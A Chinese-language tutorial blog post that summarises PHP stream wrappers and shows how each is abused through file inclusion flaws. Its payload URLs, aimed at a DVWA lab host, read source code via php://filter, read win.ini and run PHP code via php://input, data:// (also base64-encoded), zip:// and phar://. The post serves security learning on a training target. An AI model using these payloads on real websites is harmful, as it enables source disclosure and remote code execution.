php偽協(xié)議小結(jié)[web安全]

PHP偽協(xié)議:

協(xié)議 功能
file:// 訪問本地文件,需要絕對路徑
http:// 訪問http/https
ftp:// 訪問ftp
zlib:// 壓縮流
data:// 數(shù)據(jù)(RFC 2397)
glob:// 查找匹配的文件路徑模式
phar:// php歸檔
ssh2::// secure shell 2
rar:// RAR
ogg:// 音頻流
expect:// 處理式交互流
php:// 訪問各個輸入/輸出流

部分協(xié)議會受到配置文件中allow_url_fopen和allow_url_include所影響
偽協(xié)議在攻防中,通常被文件包含漏洞或者xxe所利用

php://
不受allow_url_fopen影響
php://input、php://stdin、php://memory、php://temp受allow_url_include影響

php://input
可以訪問POST的內(nèi)容
當enctype="multipart/from-data"時,php://input無效
在文件包含頁面:http://192.168.83.33/DVWA/vulnerabilities/fi/?page=php://input
post提交<?php phpinfo()?>


php://filter
php://filter可以讀寫文件
在文件包含頁面讀取源碼:http://192.168.83.33/DVWA/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=index.php
讀出的源碼經(jīng)過了base64編碼,不經(jīng)過base64編碼的話會直接執(zhí)行

file://
不受allow_url_fopen和allow_url_include影響
使用方法: file://+[文件絕對路徑]
在文件包含頁面:http://192.168.83.33/DVWA/vulnerabilities/fi/?page=file://c:/windows/win.ini

成功讀取到win.ini的內(nèi)容

zip://、bzip://、zlib://
不受allow_url_fopen和allow_url_include影響
使用方法:zip://[壓縮包絕對路徑]#[壓縮包文件的子文件名]
寫入<?php phpinfo();?>到1.txt并壓縮到c://1.zip
在文件包含頁面:http://192.168.83.33/DVWA/vulnerabilities/fi/?page=zip://c:/1.zip%231.txt (這里我用#號會報錯,所以使用了%23)

data://
受allow_url_fopen和allow_url_include影響
可以利用該協(xié)議執(zhí)行代碼
page=data://text/plain,<?php phpinfo()?>
如果有符號被過濾可以試試base64編碼page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

phar://
寫入<?php phpinfo();?>到1.txt并壓縮到c://1.zip,改后綴名為1.jpg
在文件包含頁面:http://192.168.83.33/DVWA/vulnerabilities/fi/?page=phar://c:/1.jpg/1.txt


可以看到這樣也可以執(zhí)行php代碼

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 文件包含 程序開發(fā)人員一般會把重復(fù)使用的函數(shù)寫到單個文件中,需要使用某個函數(shù)時直接調(diào)用此文件,而無需再次編寫,這中...
    二潘閱讀 8,704評論 2 4
  • 文檔:http://www.freebuf.com/articles/web/119150.html File I...
    BerL1n閱讀 2,971評論 0 2
  • DVWA-1.9系列一共分為10個功能模塊: Brute Force(暴力破解) Command Injectio...
    網(wǎng)絡(luò)安全自修室閱讀 1,579評論 0 0
  • 1、備份 2、下載新的CentOS-Base.repo 到/etc/yum.repos.d/ 3、之后運行yum ...
    sa_justin閱讀 222評論 0 0
  • //勢之中// 沒方向的風 一個勁兒狂刮 老枝舊葉 模樣晃到浮夸 鳥兒也拼命嘰喳 沙千顆 塵萬粒 齊涌向空中 似千...
    單想閱讀 125評論 0 1

友情鏈接更多精彩內(nèi)容